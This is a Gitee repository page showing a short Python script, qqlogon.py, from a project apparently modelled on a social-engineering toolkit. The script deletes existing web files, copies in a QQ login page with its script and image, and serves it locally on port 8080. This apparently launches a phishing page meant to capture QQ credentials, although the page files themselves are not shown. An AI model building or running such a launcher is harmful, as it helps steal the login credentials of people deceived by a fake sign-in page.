加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
克隆/下载
qqlogon.py 668 Bytes
一键复制 编辑 原始数据 按行查看 历史
LinWin-Cloud 提交于 2022-03-26 08:53 . SetoolLinux
#qq logon page write
print("")
print("")
print("finish the file: qqlogon.py")
print("finish the file: set.py")
print("finish the file: setoollin.py")
print("loading...")
#to find the file path yes or no true
#start to write the cantent to the file
with open("../date.txt","a") as f:
f.write("start qqlogon")
f.close()
import os
#start port 8080
os.system("rm -f index.html")
os.system("rm -f index.js")
os.system("cp qq/index.html ./")
os.system("cp qq/index.js ./")
os.system("cp qq/qqlogon.jpg ./")
os.system("python3 -m http.server 8080")
with open("date.txt","a") as f:
f.write("start the port 8080")
f.close()
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化